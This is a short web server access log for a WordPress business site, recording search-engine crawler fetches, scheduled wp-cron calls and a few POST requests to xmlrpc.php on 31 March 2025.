66.249.64.106 - - [31/Mar/2025:03:04:21 -0400] "GET /wp-content/themes/chromenews/assets/jquery.cookie.js?ver=6.7.2 HTTP/1.1" 304 0 "https://shahmeenaindustry.com/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.106 - - [31/Mar/2025:03:04:22 -0400] "GET /wp-content/themes/chromenews/assets/marquee/jquery.marquee.js?ver=4.9.3 HTTP/1.1" 304 0 "https://shahmeenaindustry.com/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.106 - - [31/Mar/2025:03:04:22 -0400] "GET /wp-content/themes/chromenews/js/navigation.js?ver=20151215 HTTP/1.1" 304 0 "https://shahmeenaindustry.com/" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.0.209.35 - - [31/Mar/2025:03:10:50 -0400] "POST /xmlrpc.php HTTP/1.1" 200 0 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
198.54.114.83 - - [31/Mar/2025:03:11:02 -0400] "POST /wp-cron.php?doing_wp_cron=1743405055.4080030918121337890625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
216.244.66.200 - - [31/Mar/2025:03:14:28 -0400] "GET /skiff-rental-how-to-be-a-successful-skiff-rental-business/feed/ HTTP/1.1" 200 465 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
192.64.117.43 - - [31/Mar/2025:03:21:37 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
198.54.114.83 - - [31/Mar/2025:03:32:35 -0400] "POST /wp-cron.php?doing_wp_cron=1743406354.7357199192047119140625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
198.187.29.24 - - [31/Mar/2025:03:32:34 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36"
